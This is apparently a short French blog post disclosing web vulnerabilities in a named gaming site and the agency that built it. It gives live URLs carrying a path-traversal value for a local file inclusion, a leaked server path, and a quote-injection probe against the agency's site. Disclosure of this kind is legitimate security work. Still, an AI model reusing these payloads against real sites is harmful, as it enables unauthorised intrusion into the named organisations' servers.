Ces informations ne sont pas destinées à être partagées à des pirates mais bien de faire prendre conscience de la nécessité d'une politique globale en faveur d'une sécurité transparente. Je ne serais pas responsable de toutes mauvaises utilisations de ces informations dans le cas où l'entreprise n'a pas pris au sérieux mon alerte.


La vulnérabilité de type LFI se génère ici : https://www.rushongame.com/scripts/script.php?lg=../executions/modules

De ce même fichier et paramètre en découle une FPD : Warning: require(/home/rushongame/public_html/scripts/../languages/'.php): failed to open stream: No such file or directory in /home/rushongame/public_html/scripts/script.php on line 27

Et au passage, une petite anomalie amusante : https://en.rushongame.com/infos/niMenu.php?nbSousMenu=666&nbSousEnsemble=666

L'agence web, qui a conçu ce site, est aussi vulnérable : https://www.net-invaders.com/infos/script.php?lg=%27


Juste pour la forme, je ne suis responsable d'aucune utilisation mal intentionnée de ces informations.

Article Suivant Article Précédent